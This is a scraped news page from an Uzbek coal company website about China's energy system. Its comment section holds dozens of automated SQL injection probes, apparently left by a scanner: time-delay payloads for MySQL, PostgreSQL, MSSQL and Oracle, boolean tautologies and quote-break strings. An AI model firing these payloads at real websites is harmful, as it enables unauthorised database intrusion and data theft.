XXR energetika tizimi faoliyati bilan tanishuv

Nashr qilingan sana: 09.02.2024 23:49:12

Izohlar
Commentator
if(now()=sysdate(),sleep(15),0)
16.02.2024 23:55:59
555

Commentator
-1" OR 2+876-876-1=0+0+0+1 --
16.02.2024 23:55:55
555

Commentator
-1' OR 2+614-614-1=0+0+0+1 or 'oitKklVe'='
16.02.2024 23:55:54
555

Commentator
-1' OR 2+879-879-1=0+0+0+1 --
16.02.2024 23:55:50
555

Commentator
-1 OR 2+368-368-1=0+0+0+1
16.02.2024 23:55:47
555

Commentator
-1 OR 2+99-99-1=0+0+0+1 --
16.02.2024 23:55:45
555

Commentator
LeULadcW
16.02.2024 23:55:44
555

Commentator
VABxvsyH
16.02.2024 23:55:41
555

Commentator
VABxvsyH
16.02.2024 23:55:37
555

Commentator
VABxvsyH
16.02.2024 23:54:39
555

Commentator
VABxvsyH
16.02.2024 23:54:35
555

Commentator
VABxvsyH
16.02.2024 23:54:33
@@6vdV6

Commentator
VABxvsyH
16.02.2024 23:54:26
1'"

Commentator
VABxvsyH
16.02.2024 23:54:25
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Commentator
VABxvsyH
16.02.2024 23:54:18
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Commentator
VABxvsyH
16.02.2024 23:54:16
7JNzGT8T')) OR 470=(SELECT 470 FROM PG_SLEEP(15))--

Commentator
VABxvsyH
16.02.2024 23:54:13
jPnMFeFc') OR 392=(SELECT 392 FROM PG_SLEEP(15))--

Commentator
VABxvsyH
16.02.2024 23:54:09
BpNyvaZS' OR 334=(SELECT 334 FROM PG_SLEEP(15))--

Commentator
VABxvsyH
16.02.2024 23:54:07
-1)) OR 507=(SELECT 507 FROM PG_SLEEP(15))--

Commentator
VABxvsyH
16.02.2024 23:54:04
-5) OR 39=(SELECT 39 FROM PG_SLEEP(15))--

Commentator
VABxvsyH
16.02.2024 23:54:01
-5 OR 195=(SELECT 195 FROM PG_SLEEP(15))--

Commentator
VABxvsyH
16.02.2024 23:53:55
hCCIo0TR'; waitfor delay '0:0:15' --

Commentator
VABxvsyH
16.02.2024 23:53:51
1 waitfor delay '0:0:15' --

Commentator
VABxvsyH
16.02.2024 23:53:48
-1); waitfor delay '0:0:15' --

Commentator
VABxvsyH
16.02.2024 23:53:46
-1; waitfor delay '0:0:15' --

Commentator
VABxvsyH
16.02.2024 23:53:42
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Commentator
VABxvsyH
16.02.2024 23:53:39
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Commentator
VABxvsyH
16.02.2024 23:53:35
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Commentator
VABxvsyH
16.02.2024 23:53:30
if(now()=sysdate(),sleep(15),0)

Commentator
VABxvsyH
16.02.2024 23:53:29
-1" OR 2+320-320-1=0+0+0+1 --

Commentator
VABxvsyH
16.02.2024 23:53:27
-1' OR 2+89-89-1=0+0+0+1 or 'TFpg3n1i'='

Commentator
VABxvsyH
16.02.2024 23:53:26
-1' OR 2+970-970-1=0+0+0+1 --

Commentator
VABxvsyH
16.02.2024 23:53:24
-1 OR 2+622-622-1=0+0+0+1

Commentator
VABxvsyH
16.02.2024 23:53:22
-1 OR 2+880-880-1=0+0+0+1 --

Commentator
VABxvsyH
16.02.2024 23:53:21
xUPNQL7Q

Commentator
VABxvsyH
16.02.2024 23:53:16
555

Commentator
VABxvsyH
16.02.2024 23:53:11
555

Commentator
VABxvsyH
16.02.2024 23:52:18
555

Commentator
VABxvsyH
16.02.2024 23:52:14
555

Commentator
VABxvsyH
16.02.2024 23:51:59
555

Commentator
VABxvsyH
16.02.2024 23:43:41
555

Commentator
VABxvsyH
16.02.2024 23:43:33
555

Commentator
VABxvsyH
16.02.2024 23:43:32
555

Commentator
VABxvsyH
16.02.2024 23:43:29
555

Commentator
VABxvsyH
16.02.2024 23:43:27
555

Commentator
VABxvsyH
16.02.2024 23:43:26
555

Commentator
VABxvsyH
16.02.2024 23:43:25
555

Commentator
VABxvsyH
16.02.2024 23:43:24
555

Commentator
VABxvsyH
16.02.2024 23:43:22
555

Commentator
VABxvsyH
16.02.2024 23:43:20
555

Commentator
VABxvsyH
16.02.2024 23:43:18
555

Commentator
VABxvsyH
16.02.2024 23:43:14
555

Commentator
VABxvsyH
16.02.2024 23:43:13
555

Commentator
VABxvsyH
16.02.2024 23:43:12
555

Commentator
VABxvsyH
16.02.2024 23:43:11
555

Commentator
VABxvsyH
16.02.2024 23:43:10
555

Commentator
VABxvsyH
16.02.2024 23:43:08
555

Commentator
VABxvsyH
16.02.2024 23:43:06
555

Commentator
VABxvsyH
16.02.2024 23:43:03
555

Commentator
VABxvsyH
16.02.2024 23:42:59
555

Commentator
@@AFiMW
16.02.2024 23:42:54
555

Commentator
1'"
16.02.2024 23:42:50
555

Commentator
VABxvsyH'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
16.02.2024 23:42:49
555

Commentator
NPePhKqF')) OR 396=(SELECT 396 FROM PG_SLEEP(15))--
16.02.2024 23:42:45
555

Commentator
SWOJnzqu') OR 529=(SELECT 529 FROM PG_SLEEP(15))--
16.02.2024 23:42:41
555

Commentator
etmdw8pr' OR 522=(SELECT 522 FROM PG_SLEEP(15))--
16.02.2024 23:42:36
555

Commentator
wFjdyKB8'; waitfor delay '0:0:15' --
16.02.2024 23:42:30
555

Commentator
1 waitfor delay '0:0:15' --
16.02.2024 23:42:23
555

Commentator
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
16.02.2024 23:42:16
555

Commentator
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
16.02.2024 23:42:10
555

Commentator
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
16.02.2024 23:42:04
555

Commentator
if(now()=sysdate(),sleep(15),0)
16.02.2024 23:41:59
555

Commentator
-1" OR 2+779-779-1=0+0+0+1 --
16.02.2024 23:41:57
555

Commentator
-1' OR 2+345-345-1=0+0+0+1 or 'JKXrGJen'='
16.02.2024 23:41:54
555

Commentator
-1' OR 2+731-731-1=0+0+0+1 --
16.02.2024 23:41:51
555

Commentator
-1 OR 2+491-491-1=0+0+0+1
16.02.2024 23:41:48
555

Commentator
-1 OR 2+569-569-1=0+0+0+1 --
16.02.2024 23:41:45
555

Commentator
9rx0Vilz
16.02.2024 23:41:40
555

Commentator
VABxvsyH
16.02.2024 23:41:36
555

Commentator
VABxvsyH
16.02.2024 23:41:34
555

Commentator
VABxvsyH
16.02.2024 23:40:42
555

Commentator
VABxvsyH
16.02.2024 23:40:41
555

Commentator
VABxvsyH
16.02.2024 23:40:39
@@dp8xh

Commentator
VABxvsyH
16.02.2024 23:40:35
1'"

Commentator
VABxvsyH
16.02.2024 23:40:35
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Commentator
VABxvsyH
16.02.2024 23:40:32
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Commentator
VABxvsyH
16.02.2024 23:40:32
9tymnDEJ')) OR 408=(SELECT 408 FROM PG_SLEEP(15))--

Commentator
VABxvsyH
16.02.2024 23:40:30
gOCBR1YS') OR 439=(SELECT 439 FROM PG_SLEEP(15))--

Commentator
VABxvsyH
16.02.2024 23:40:29
BGVEFkCQ' OR 40=(SELECT 40 FROM PG_SLEEP(15))--

Commentator
VABxvsyH
16.02.2024 23:40:28
-1)) OR 146=(SELECT 146 FROM PG_SLEEP(15))--

Commentator
VABxvsyH
16.02.2024 23:40:27
-5) OR 953=(SELECT 953 FROM PG_SLEEP(15))--

Commentator
VABxvsyH
16.02.2024 23:40:26
-5 OR 952=(SELECT 952 FROM PG_SLEEP(15))--

Commentator
VABxvsyH
16.02.2024 23:40:25
7Cz2zYPh'; waitfor delay '0:0:15' --

Commentator
VABxvsyH
16.02.2024 23:40:24
1 waitfor delay '0:0:15' --

Commentator
VABxvsyH
16.02.2024 23:40:21
-1); waitfor delay '0:0:15' --

Commentator
VABxvsyH
16.02.2024 23:40:17
-1; waitfor delay '0:0:15' --

Commentator
VABxvsyH
16.02.2024 23:40:15
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Commentator
VABxvsyH
16.02.2024 23:40:14
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Commentator
VABxvsyH
16.02.2024 23:40:12
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Commentator
VABxvsyH
16.02.2024 23:40:05
if(now()=sysdate(),sleep(15),0)

Commentator
VABxvsyH
16.02.2024 23:39:59
-1" OR 2+438-438-1=0+0+0+1 --

Commentator
VABxvsyH
16.02.2024 23:39:56
-1' OR 2+444-444-1=0+0+0+1 or 'X8M8uss9'='

Commentator
VABxvsyH
16.02.2024 23:39:55
-1' OR 2+659-659-1=0+0+0+1 --

Commentator
VABxvsyH
16.02.2024 23:39:54
-1 OR 2+205-205-1=0+0+0+1

Commentator
VABxvsyH
16.02.2024 23:39:51
-1 OR 2+894-894-1=0+0+0+1 --

Commentator
VABxvsyH
16.02.2024 23:39:51
skV1QN0C

Commentator
VABxvsyH
16.02.2024 23:39:44
555

Commentator
VABxvsyH
16.02.2024 23:39:37
555

Commentator
VABxvsyH
16.02.2024 23:38:29
555

Commentator
VABxvsyH
16.02.2024 23:38:28
555

Commentator
VABxvsyH
16.02.2024 23:38:07
555

Sizning izohingiz
Oxirgi yangiliklar:

image

Ijtimoiy so‘rovnoma natijalari nimalarni ko‘rsatmoqda?

  So‘ngi kunlarda ob-havoning keskin sovib ketishi aholi iste’molchilarida energiya resurslariga, xususan tabiiy gaz yetib bormagan hududlarda ko‘mir yoqilg‘isiga tala...

O'qish
image

Bo'sh ish o'rinlari

“O’zbekko’mir” AJning bo’sh ish o’rinlariga ishga qabul qilish uchun talabgorlarning ariza va hujjatlari, 2024 yilning 21 fevral sot 12:00 dan 26 fevral  soat 17:00 ga qa...

O'qish
image

“Sovg‘a” qachon “pora”ga aylanadi?

Bayram va boshqa tadbirlarning zavqli jihatlaridan biri sovg‘a berish va olish bo‘lsa kerak.   Oila a’zolari, do‘sti va yaqinlar, hamkasblar bir-biriga, tashkilotla...

O'qish
image

Ko‘mir omborlarida mahsulot sotuvi keng yo‘lga qo‘yilgan

Ayni kunlarda “Ko‘mir ta’minot” MCHJning respublika hududiy ko‘mir omborlari yanada gavjumlashib qolgan. Sababi, ob-havoning keskin pasayib ketishi tabiiy gaz yetib borma...

O'qish

Uzbekcoal.uz yangiliklariiga obuna bo'ling